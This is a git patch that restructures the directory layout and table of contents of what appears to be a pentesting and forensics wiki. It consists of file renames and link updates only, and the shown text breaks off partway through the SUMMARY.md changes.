From 070200605afb616265cc1b8297d2de6466972c65 Mon Sep 17 00:00:00 2001 From: CPol Date: Sun, 1 May 2022 15:53:26 +0000 Subject: [PATCH] GitBook: [#3161] No subject --- README.md | 4 +- SUMMARY.md | 169 ++++++++++-------- cloud-security/cloud-security.md | 2 + .../pentesting-kubernetes/README.md | 0 .../README.md | 4 +- .../attacking-kubernetes-from-inside-a-pod.md | 0 .../exposing-services-in-kubernetes.md | 0 .../kubernetes-basics.md | 0 .../kubernetes-enumeration.md | 64 ++++--- .../kubernetes-hardening/README.md | 0 .../kubernetes-networkpolicies.md | 0 .../kubernetes-securitycontext-s.md | 0 .../monitoring-with-falco.md | 0 ...bernetes-role-based-access-control-rbac.md | 0 .../namespace-escalation.md | 15 +- .../pentesting-kubernetes-from-the-outside.md | 0 .../bra.i.nsmasher-presentation/README.md | 0 .../basic-bruteforcer.md | 0 .../basic-captcha-breaker.md | 0 .../bim-bruteforcer.md | 0 .../hybrid-malware-classifier-part-1.md | 0 .../ml-basics/README.md | 0 .../ml-basics/feature-engineering.md | 0 ...d-elearnsecurity-certifications-reviews.md | 0 .../basic-forensic-methodology/README.md | 0 .../anti-forensic-techniques.md | 0 .../docker-forensics.md | 0 .../file-integrity-monitoring.md | 0 .../image-adquisition-and-mount.md | 0 .../linux-forensics.md | 0 .../malware-analysis.md | 0 .../memory-dump-analysis/README.md | 0 .../volatility-examples.md | 0 .../partitions-file-systems-carving/README.md | 0 .../partitions-file-systems-carving/ext.md | 0 .../file-data-carving-recovery-tools.md | 0 .../partitions-file-systems-carving/ntfs.md | 0 .../pcap-inspection/README.md | 0 .../pcap-inspection/dnscat-exfiltration.md | 0 .../pcap-inspection/usb-keystrokes.md | 0 .../pcap-inspection/wifi-pcap-analysis.md | 0 .../pcap-inspection/wireshark-tricks.md | 0 .../.pyc.md | 0 .../README.md | 0 .../browser-artifacts.md | 0 .../desofuscation-vbs-cscript.exe.md | 0 .../local-cloud-storage.md | 0 .../office-file-analysis.md | 0 .../pdf-file-analysis.md | 0 .../png-tricks.md | 0 .../video-and-audio-file-analysis.md | 0 .../zips-tricks.md | 0 .../windows-forensics/README.md | 0 .../interesting-windows-registry-keys.md | 0 .../windows-forensics/windows-processes.md | 0 .../pentesting-methodology.md | 8 +- .../common-api-used-in-malware.md | 0 .../linux-exploiting-basic-esp/README.md | 0 .../bypassing-canary-and-pie.md | 0 .../format-strings-template.md | 0 .../linux-exploiting-basic-esp/fusion.md | 0 .../linux-exploiting-basic-esp/ret2lib.md | 0 .../rop-leaking-libc-address/README.md | 0 .../rop-leaking-libc-template.md | 0 .../rop-syscall-execv.md | 0 group-1/reversing-and-exploiting.md | 2 + .../reversing-tools-basic-methods/README.md | 55 +++--- .../angr/README.md | 0 .../angr/angr-examples.md | 0 .../blobrunner.md | 0 .../cheat-engine.md | 0 .../satisfiability-modulo-theories-smt-z3.md | 0 {exploiting => group-1}/tools/README.md | 0 {exploiting => group-1}/tools/pwntools.md | 0 ...windows-exploiting-basic-guide-oscp-lvl.md | 0 .../escaping-from-gui-applications/README.md | 0 .../show-file-extensions.md | 0 .../firmware-analysis/README.md | 48 +++-- .../firmware-analysis/bootloader-testing.md | 0 .../firmware-analysis/firmware-integrity.md | 0 .../physical-attacks.md | 0 .../bypass-python-sandboxes/README.md | 74 ++++---- .../android-app-pentesting/README.md | 2 +- .../README.md | 84 +++++---- .../csrf-cross-site-request-forgery.md | 2 +- .../README.md} | 54 +++--- .../web-vulnerabilities-methodology.md | 2 +- .../xss-cross-site-scripting/README.md | 4 +- ...itive-information-disclosure-from-a-web.md | 10 +- 89 files changed, 298 insertions(+), 305 deletions(-) create mode 100644 cloud-security/cloud-security.md rename {pentesting => cloud-security}/pentesting-kubernetes/README.md (100%) rename {pentesting => cloud-security}/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md (100%) rename {pentesting => cloud-security}/pentesting-kubernetes/exposing-services-in-kubernetes.md (100%) rename {pentesting => cloud-security}/pentesting-kubernetes/kubernetes-basics.md (100%) rename {pentesting => cloud-security}/pentesting-kubernetes/kubernetes-hardening/README.md (100%) rename {pentesting => cloud-security}/pentesting-kubernetes/kubernetes-hardening/kubernetes-networkpolicies.md (100%) rename {pentesting => cloud-security}/pentesting-kubernetes/kubernetes-hardening/kubernetes-securitycontext-s.md (100%) rename {pentesting => cloud-security}/pentesting-kubernetes/kubernetes-hardening/monitoring-with-falco.md (100%) rename {pentesting => cloud-security}/pentesting-kubernetes/kubernetes-role-based-access-control-rbac.md (100%) rename {pentesting => cloud-security}/pentesting-kubernetes/pentesting-kubernetes-from-the-outside.md (100%) rename {a.i.-exploiting => external-platforms-reviews-writeups}/bra.i.nsmasher-presentation/README.md (100%) rename {a.i.-exploiting => external-platforms-reviews-writeups}/bra.i.nsmasher-presentation/basic-bruteforcer.md (100%) rename {a.i.-exploiting => external-platforms-reviews-writeups}/bra.i.nsmasher-presentation/basic-captcha-breaker.md (100%) rename {a.i.-exploiting => external-platforms-reviews-writeups}/bra.i.nsmasher-presentation/bim-bruteforcer.md (100%) rename {a.i.-exploiting => external-platforms-reviews-writeups}/bra.i.nsmasher-presentation/hybrid-malware-classifier-part-1.md (100%) rename {a.i.-exploiting => external-platforms-reviews-writeups}/bra.i.nsmasher-presentation/ml-basics/README.md (100%) rename {a.i.-exploiting => external-platforms-reviews-writeups}/bra.i.nsmasher-presentation/ml-basics/feature-engineering.md (100%) rename {courses-and-certifications-reviews => external-platforms-reviews-writeups}/ine-courses-and-elearnsecurity-certifications-reviews.md (100%) rename {forensics => generic-methodologies-and-resources}/basic-forensic-methodology/README.md (100%) rename {forensics => generic-methodologies-and-resources}/basic-forensic-methodology/anti-forensic-techniques.md (100%) rename {forensics => generic-methodologies-and-resources}/basic-forensic-methodology/docker-forensics.md (100%) rename {forensics => generic-methodologies-and-resources}/basic-forensic-methodology/file-integrity-monitoring.md (100%) rename {forensics => generic-methodologies-and-resources}/basic-forensic-methodology/image-adquisition-and-mount.md (100%) rename {forensics => generic-methodologies-and-resources}/basic-forensic-methodology/linux-forensics.md (100%) rename {forensics => generic-methodologies-and-resources}/basic-forensic-methodology/malware-analysis.md (100%) rename {forensics => generic-methodologies-and-resources}/basic-forensic-methodology/memory-dump-analysis/README.md (100%) rename {forensics => generic-methodologies-and-resources}/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md (100%) rename {forensics => generic-methodologies-and-resources}/basic-forensic-methodology/partitions-file-systems-carving/README.md (100%) rename {forensics => generic-methodologies-and-resources}/basic-forensic-methodology/partitions-file-systems-carving/ext.md (100%) rename {forensics => generic-methodologies-and-resources}/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md (100%) rename {forensics => generic-methodologies-and-resources}/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md (100%) rename {forensics => generic-methodologies-and-resources}/basic-forensic-methodology/pcap-inspection/README.md (100%) rename {forensics => generic-methodologies-and-resources}/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md (100%) rename {forensics => generic-methodologies-and-resources}/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md (100%) rename {forensics => generic-methodologies-and-resources}/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md (100%) rename {forensics => generic-methodologies-and-resources}/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md (100%) rename {forensics => generic-methodologies-and-resources}/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md (100%) rename {forensics => generic-methodologies-and-resources}/basic-forensic-methodology/specific-software-file-type-tricks/README.md (100%) rename {forensics => generic-methodologies-and-resources}/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md (100%) rename {forensics => generic-methodologies-and-resources}/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md (100%) rename {forensics => generic-methodologies-and-resources}/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md (100%) rename {forensics => generic-methodologies-and-resources}/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md (100%) rename {forensics => generic-methodologies-and-resources}/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md (100%) rename {forensics => generic-methodologies-and-resources}/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md (100%) rename {forensics => generic-methodologies-and-resources}/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md (100%) rename {forensics => generic-methodologies-and-resources}/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md (100%) rename {forensics => generic-methodologies-and-resources}/basic-forensic-methodology/windows-forensics/README.md (100%) rename {forensics => generic-methodologies-and-resources}/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md (100%) rename {forensics => generic-methodologies-and-resources}/basic-forensic-methodology/windows-forensics/windows-processes.md (100%) rename {reversing => group-1}/common-api-used-in-malware.md (100%) rename {exploiting => group-1}/linux-exploiting-basic-esp/README.md (100%) rename {exploiting => group-1}/linux-exploiting-basic-esp/bypassing-canary-and-pie.md (100%) rename {exploiting => group-1}/linux-exploiting-basic-esp/format-strings-template.md (100%) rename {exploiting => group-1}/linux-exploiting-basic-esp/fusion.md (100%) rename {exploiting => group-1}/linux-exploiting-basic-esp/ret2lib.md (100%) rename {exploiting => group-1}/linux-exploiting-basic-esp/rop-leaking-libc-address/README.md (100%) rename {exploiting => group-1}/linux-exploiting-basic-esp/rop-leaking-libc-address/rop-leaking-libc-template.md (100%) rename {exploiting => group-1}/linux-exploiting-basic-esp/rop-syscall-execv.md (100%) create mode 100644 group-1/reversing-and-exploiting.md rename {reversing => group-1}/reversing-tools-basic-methods/README.md (95%) rename {reversing => group-1}/reversing-tools-basic-methods/angr/README.md (100%) rename {reversing => group-1}/reversing-tools-basic-methods/angr/angr-examples.md (100%) rename {reversing => group-1}/reversing-tools-basic-methods/blobrunner.md (100%) rename {reversing => group-1}/reversing-tools-basic-methods/cheat-engine.md (100%) rename {reversing => group-1}/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md (100%) rename {exploiting => group-1}/tools/README.md (100%) rename {exploiting => group-1}/tools/pwntools.md (100%) rename {exploiting => group-1}/windows-exploiting-basic-guide-oscp-lvl.md (100%) rename {physical-attacks => hardware-physical-access}/escaping-from-gui-applications/README.md (100%) rename {physical-attacks => hardware-physical-access}/escaping-from-gui-applications/show-file-extensions.md (100%) rename {physical-attacks => hardware-physical-access}/firmware-analysis/README.md (96%) rename {physical-attacks => hardware-physical-access}/firmware-analysis/bootloader-testing.md (100%) rename {physical-attacks => hardware-physical-access}/firmware-analysis/firmware-integrity.md (100%) rename {physical-attacks => hardware-physical-access}/physical-attacks.md (100%) rename pentesting-web/{dangling-markup-html-scriptless-injection.md => dangling-markup-html-scriptless-injection/README.md} (91%) diff --git a/README.md b/README.md index 92ec9ca7e..9cd4aaacc 100644 --- a/README.md +++ b/README.md @@ -78,8 +78,8 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm You can find **my reviews of the certifications eMAPT and eWPTXv2** (and their **respective preparation courses**) in the following page: -{% content-ref url="courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md" %} -[ine-courses-and-elearnsecurity-certifications-reviews.md](courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md) +{% content-ref url="external-platforms-reviews-writeups/ine-courses-and-elearnsecurity-certifications-reviews.md" %} +[ine-courses-and-elearnsecurity-certifications-reviews.md](external-platforms-reviews-writeups/ine-courses-and-elearnsecurity-certifications-reviews.md) {% endcontent-ref %} ## License diff --git a/SUMMARY.md b/SUMMARY.md index 05462a949..f35f20fc8 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -25,6 +25,37 @@ * [Clone a Website](generic-methodologies-and-resources/phishing-methodology/clone-a-website.md) * [Detecting Phising](generic-methodologies-and-resources/phishing-methodology/detecting-phising.md) * [Phishing Documents](generic-methodologies-and-resources/phishing-methodology/phishing-documents.md) +* [Basic Forensic Methodology](generic-methodologies-and-resources/basic-forensic-methodology/README.md) + * [Baseline Monitoring](generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md) + * [Anti-Forensic Techniques](generic-methodologies-and-resources/basic-forensic-methodology/anti-forensic-techniques.md) + * [Docker Forensics](generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md) + * [Image Adquisition & Mount](generic-methodologies-and-resources/basic-forensic-methodology/image-adquisition-and-mount.md) + * [Linux Forensics](generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md) + * [Malware Analysis](generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md) + * [Memory dump analysis](generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/README.md) + * [Volatility - CheatSheet](generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md) + * [Partitions/File Systems/Carving](generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md) + * [EXT](generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/ext.md) + * [File/Data Carving & Recovery Tools](generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md) + * [NTFS](generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md) + * [Pcap Inspection](generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/README.md) + * [DNSCat pcap analysis](generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md) + * [USB Keystrokes](generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md) + * [Wifi Pcap Analysis](generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md) + * [Wireshark tricks](generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md) + * [Specific Software/File-Type Tricks](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md) + * [Decompile compiled python binaries (exe, elf) - Retreive from .pyc](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md) + * [Browser Artifacts](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md) + * [Desofuscation vbs (cscript.exe)](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md) + * [Local Cloud Storage](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md) + * [Office file analysis](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md) + * [PDF File analysis](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md) + * [PNG tricks](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md) + * [Video and Audio file analysis](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md) + * [ZIPs tricks](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md) + * [Windows Artifacts](generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md) + * [Windows Processes](generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/windows-processes.md) + * [Interesting Windows Registry Keys](generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md) * [Brute Force - CheatSheet](generic-methodologies-and-resources/brute-force.md) * [Exfiltration](generic-methodologies-and-resources/exfiltration.md) * [Tunneling and Port Forwarding](generic-methodologies-and-resources/tunneling-and-port-forwarding.md) @@ -367,7 +398,7 @@ * [47808/udp - Pentesting BACNet](network-services-pentesting/47808-udp-bacnet.md) * [50030,50060,50070,50075,50090 - Pentesting Hadoop](network-services-pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md) -*** +## 🕸 Pentesting Web * [Web Vulnerabilities Methodology](pentesting-web/web-vulnerabilities-methodology.md) * [Reflecting Techniques - PoCs and Polygloths CheatSheet](pentesting-web/pocs-and-polygloths-cheatsheet/README.md) @@ -389,7 +420,7 @@ * [CRLF (%0D%0A) Injection](pentesting-web/crlf-0d-0a.md) * [Cross-site WebSocket hijacking (CSWSH)](pentesting-web/cross-site-websocket-hijacking-cswsh.md) * [CSRF (Cross Site Request Forgery)](pentesting-web/csrf-cross-site-request-forgery.md) -* [Dangling Markup - HTML scriptless injection](pentesting-web/dangling-markup-html-scriptless-injection.md) +* [Dangling Markup - HTML scriptless injection](pentesting-web/dangling-markup-html-scriptless-injection/README.md) * [HTML Injection / Char-by-char Exfiltration](pentesting-web/dangling-markup-html-scriptless-injection/html-injection-char-by-char-exfiltration/README.md) * [CSS Injection Code](pentesting-web/dangling-markup-html-scriptless-injection/html-injection-char-by-char-exfiltration/css-injection-code.md) * [Deserialization](pentesting-web/deserialization/README.md) @@ -423,10 +454,10 @@ * [hop-by-hop headers](pentesting-web/abusing-hop-by-hop-headers.md) * [IDOR](pentesting-web/idor.md) * [JWT Vulnerabilities (Json Web Tokens)](pentesting-web/hacking-jwt-json-web-tokens.md) -* [NoSQL injection](pentesting-web/nosql-injection.md) * [LDAP Injection](pentesting-web/ldap-injection.md) * [Login Bypass](pentesting-web/login-bypass/README.md) * [Login bypass List](pentesting-web/login-bypass/sql-login-bypass.md) +* [NoSQL injection](pentesting-web/nosql-injection.md) * [OAuth to Account takeover](pentesting-web/oauth-to-account-takeover.md) * [Open Redirect](pentesting-web/open-redirect.md) * [Parameter Pollution](pentesting-web/parameter-pollution.md) @@ -475,37 +506,10 @@ * [Steal Info JS](pentesting-web/xss-cross-site-scripting/steal-info-js.md) * [XSSI (Cross-Site Script Inclusion)](pentesting-web/xssi-cross-site-script-inclusion.md) * [XS-Search](pentesting-web/xs-search.md) -* [Basic Forensic Methodology](forensics/basic-forensic-methodology/README.md) - * [Baseline Monitoring](forensics/basic-forensic-methodology/file-integrity-monitoring.md) - * [Anti-Forensic Techniques](forensics/basic-forensic-methodology/anti-forensic-techniques.md) - * [Docker Forensics](forensics/basic-forensic-methodology/docker-forensics.md) - * [Image Adquisition & Mount](forensics/basic-forensic-methodology/image-adquisition-and-mount.md) - * [Linux Forensics](forensics/basic-forensic-methodology/linux-forensics.md) - * [Malware Analysis](forensics/basic-forensic-methodology/malware-analysis.md) - * [Memory dump analysis](forensics/basic-forensic-methodology/memory-dump-analysis/README.md) - * [Volatility - CheatSheet](forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md) - * [Partitions/File Systems/Carving](forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md) - * [EXT](forensics/basic-forensic-methodology/partitions-file-systems-carving/ext.md) - * [File/Data Carving & Recovery Tools](forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md) - * [NTFS](forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md) - * [Pcap Inspection](forensics/basic-forensic-methodology/pcap-inspection/README.md) - * [DNSCat pcap analysis](forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md) - * [USB Keystrokes](forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md) - * [Wifi Pcap Analysis](forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md) - * [Wireshark tricks](forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md) - * [Specific Software/File-Type Tricks](forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md) - * [Decompile compiled python binaries (exe, elf) - Retreive from .pyc](forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md) - * [Browser Artifacts](forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md) - * [Desofuscation vbs (cscript.exe)](forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md) - * [Local Cloud Storage](forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md) - * [Office file analysis](forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md) - * [PDF File analysis](forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md) - * [PNG tricks](forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md) - * [Video and Audio file analysis](forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md) - * [ZIPs tricks](forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md) - * [Windows Artifacts](forensics/basic-forensic-methodology/windows-forensics/README.md) - * [Windows Processes](forensics/basic-forensic-methodology/windows-forensics/windows-processes.md) - * [Interesting Windows Registry Keys](forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md) + +## ⛈ Cloud Security + +* [Cloud Security](cloud-security/cloud-security.md) * [GCP Security](cloud-security/gcp-security/README.md) * [GCP - Other Services Enumeration](cloud-security/gcp-security/gcp-looting.md) * [GCP - Abuse GCP Permissions](cloud-security/gcp-security/gcp-interesting-permissions/README.md) @@ -525,22 +529,22 @@ * [Basic Github Information](cloud-security/github-security/basic-github-information.md) * [Gitea Security](cloud-security/gitea-security/README.md) * [Basic Gitea Information](cloud-security/gitea-security/basic-gitea-information.md) -* [Kubernetes Security](pentesting/pentesting-kubernetes/README.md) - * [Kubernetes Basics](pentesting/pentesting-kubernetes/kubernetes-basics.md) - * [Pentesting Kubernetes Services](pentesting/pentesting-kubernetes/pentesting-kubernetes-from-the-outside.md) - * [Exposing Services in Kubernetes](pentesting/pentesting-kubernetes/exposing-services-in-kubernetes.md) - * [Attacking Kubernetes from inside a Pod](pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md) +* [Kubernetes Security](cloud-security/pentesting-kubernetes/README.md) + * [Kubernetes Basics](cloud-security/pentesting-kubernetes/kubernetes-basics.md) + * [Pentesting Kubernetes Services](cloud-security/pentesting-kubernetes/pentesting-kubernetes-from-the-outside.md) + * [Exposing Services in Kubernetes](cloud-security/pentesting-kubernetes/exposing-services-in-kubernetes.md) + * [Attacking Kubernetes from inside a Pod](cloud-security/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md) * [Kubernetes Enumeration](cloud-security/pentesting-kubernetes/kubernetes-enumeration.md) - * [Kubernetes Role-Based Access Control (RBAC)](pentesting/pentesting-kubernetes/kubernetes-role-based-access-control-rbac.md) + * [Kubernetes Role-Based Access Control (RBAC)](cloud-security/pentesting-kubernetes/kubernetes-role-based-access-control-rbac.md) * [Abusing Roles/ClusterRoles in Kubernetes](cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/README.md) * [K8s Roles Abuse Lab](cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/k8s-roles-abuse-lab.md) * [Pod Escape Privileges](cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md) * [Kubernetes Namespace Escalation](cloud-security/pentesting-kubernetes/namespace-escalation.md) * [Kubernetes Access to other Clouds](cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md) - * [Kubernetes Hardening](pentesting/pentesting-kubernetes/kubernetes-hardening/README.md) - * [Monitoring with Falco](pentesting/pentesting-kubernetes/kubernetes-hardening/monitoring-with-falco.md) - * [Kubernetes SecurityContext(s)](pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-securitycontext-s.md) - * [Kubernetes NetworkPolicies](pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-networkpolicies.md) + * [Kubernetes Hardening](cloud-security/pentesting-kubernetes/kubernetes-hardening/README.md) + * [Monitoring with Falco](cloud-security/pentesting-kubernetes/kubernetes-hardening/monitoring-with-falco.md) + * [Kubernetes SecurityContext(s)](cloud-security/pentesting-kubernetes/kubernetes-hardening/kubernetes-securitycontext-s.md) + * [Kubernetes NetworkPolicies](cloud-security/pentesting-kubernetes/kubernetes-hardening/kubernetes-networkpolicies.md) * [Kubernetes Network Attacks](cloud-security/pentesting-kubernetes/kubernetes-network-attacks.md) * [Concourse](cloud-security/concourse/README.md) * [Concourse Architecture](cloud-security/concourse/concourse-architecture.md) @@ -554,43 +558,56 @@ * [Atlantis](cloud-security/atlantis.md) * [Cloud Security Review](cloud-security/cloud-security-review.md) * [AWS Security](cloud-security/aws-security.md) -* [BRA.I.NSMASHER Presentation](a.i.-exploiting/bra.i.nsmasher-presentation/README.md) - * [Basic Bruteforcer](a.i.-exploiting/bra.i.nsmasher-presentation/basic-bruteforcer.md) - * [Basic Captcha Breaker](a.i.-exploiting/bra.i.nsmasher-presentation/basic-captcha-breaker.md) - * [BIM Bruteforcer](a.i.-exploiting/bra.i.nsmasher-presentation/bim-bruteforcer.md) - * [Hybrid Malware Classifier Part 1](a.i.-exploiting/bra.i.nsmasher-presentation/hybrid-malware-classifier-part-1.md) - * [ML Basics](a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/README.md) - * [Feature Engineering](a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/feature-engineering.md) + +## 😎 Hardware/Physical Access + +* [Physical Attacks](hardware-physical-access/physical-attacks.md) +* [Escaping from KIOSKs](hardware-physical-access/escaping-from-gui-applications/README.md) + * [Show file extensions](hardware-physical-access/escaping-from-gui-applications/show-file-extensions.md) +* [Firmware Analysis](hardware-physical-access/firmware-analysis/README.md) + * [Bootloader testing](hardware-physical-access/firmware-analysis/bootloader-testing.md) + * [Firmware Integrity](hardware-physical-access/firmware-analysis/firmware-integrity.md) + +## 🧐 External Platforms Reviews/Writeups + +* [BRA.I.NSMASHER Presentation](external-platforms-reviews-writeups/bra.i.nsmasher-presentation/README.md) + * [Basic Bruteforcer](external-platforms-reviews-writeups/bra.i.nsmasher-presentation/basic-bruteforcer.md) + * [Basic Captcha Breaker](external-platforms-reviews-writeups/bra.i.nsmasher-presentation/basic-captcha-breaker.md) + * [BIM Bruteforcer](external-platforms-reviews-writeups/bra.i.nsmasher-presentation/bim-bruteforcer.md) + * [Hybrid Malware Classifier Part 1](external-platforms-reviews-writeups/bra.i.nsmasher-presentation/hybrid-malware-classifier-part-1.md) + * [ML Basics](external-platforms-reviews-writeups/bra.i.nsmasher-presentation/ml-basics/README.md) + * [Feature Engineering](external-platforms-reviews-writeups/bra.i.nsmasher-presentation/ml-basics/feature-engineering.md) +* [INE Courses and eLearnSecurity Certifications Reviews](external-platforms-reviews-writeups/ine-courses-and-elearnsecurity-certifications-reviews.md) + +## Group 1 + +* [Reversing & Exploiting](group-1/reversing-and-exploiting.md) +* [Reversing Tools & Basic Methods](group-1/reversing-tools-basic-methods/README.md) + * [Angr](group-1/reversing-tools-basic-methods/angr/README.md) + * [Angr - Examples](group-1/reversing-tools-basic-methods/angr/angr-examples.md) + * [Z3 - Satisfiability Modulo Theories (SMT)](group-1/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md) + * [Cheat Engine](group-1/reversing-tools-basic-methods/cheat-engine.md) + * [Blobrunner](group-1/reversing-tools-basic-methods/blobrunner.md) +* [Common API used in Malware](group-1/common-api-used-in-malware.md) +* [Linux Exploiting (Basic) (SPA)](group-1/linux-exploiting-basic-esp/README.md) + * [Format Strings Template](group-1/linux-exploiting-basic-esp/format-strings-template.md) + * [ROP - call sys\_execve](group-1/linux-exploiting-basic-esp/rop-syscall-execv.md) + * [ROP - Leaking LIBC address](group-1/linux-exploiting-basic-esp/rop-leaking-libc-address/README.md) + * [ROP - Leaking LIBC template](group-1/linux-exploiting-basic-esp/rop-leaking-libc-address/rop-leaking-libc-template.md) + * [Bypassing Canary & PIE](group-1/linux-exploiting-basic-esp/bypassing-canary-and-pie.md) + * [Ret2Lib](group-1/linux-exploiting-basic-esp/ret2lib.md) + * [Fusion](group-1/linux-exploiting-basic-esp/fusion.md) +* [Exploiting Tools](group-1/tools/README.md) + * [PwnTools](group-1/tools/pwntools.md) +* [Windows Exploiting (Basic Guide - OSCP lvl)](group-1/windows-exploiting-basic-guide-oscp-lvl.md) + +*** + * [Blockchain & Crypto Currencies](blockchain/blockchain-and-crypto-currencies/README.md) * [Page 1](blockchain/blockchain-and-crypto-currencies/page-1.md) -* [INE Courses and eLearnSecurity Certifications Reviews](courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md) -* [Physical Attacks](physical-attacks/physical-attacks.md) -* [Escaping from KIOSKs](physical-attacks/escaping-from-gui-applications/README.md) - * [Show file extensions](physical-attacks/escaping-from-gui-applications/show-file-extensions.md) -* [Firmware Analysis](physical-attacks/firmware-analysis/README.md) - * [Bootloader testing](physical-attacks/firmware-analysis/bootloader-testing.md) - * [Firmware Integrity](physical-attacks/firmware-analysis/firmware-integrity.md) -* [Reversing Tools & Basic Methods](reversing/reversing-tools-basic-methods/README.md) - * [Angr](reversing/reversing-tools-basic-methods/angr/README.md) - * [Angr - Examples](reversing/reversing-tools-basic-methods/angr/angr-examples.md) - * [Z3 - Satisfiability Modulo Theories (SMT)](reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md) - * [Cheat Engine](reversing/reversing-tools-basic-methods/cheat-engine.md) - * [Blobrunner](reversing/reversing-tools-basic-methods/blobrunner.md) -* [Common API used in Malware](reversing/common-api-used-in-malware.md) * [Cryptographic/Compression Algorithms](reversing/cryptographic-algorithms/README.md) * [Unpacking binaries](reversing/cryptographic-algorithms/unpacking-binaries.md) * [Word Macros](reversing/word-macros.md) -* [Linux Exploiting (Basic) (SPA)](exploiting/linux-exploiting-basic-esp/README.md) - * [Format Strings Template](exploiting/linux-exploiting-basic-esp/format-strings-template.md) - * [ROP - call sys\_execve](exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md) - * [ROP - Leaking LIBC address](exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/README.md) - * [ROP - 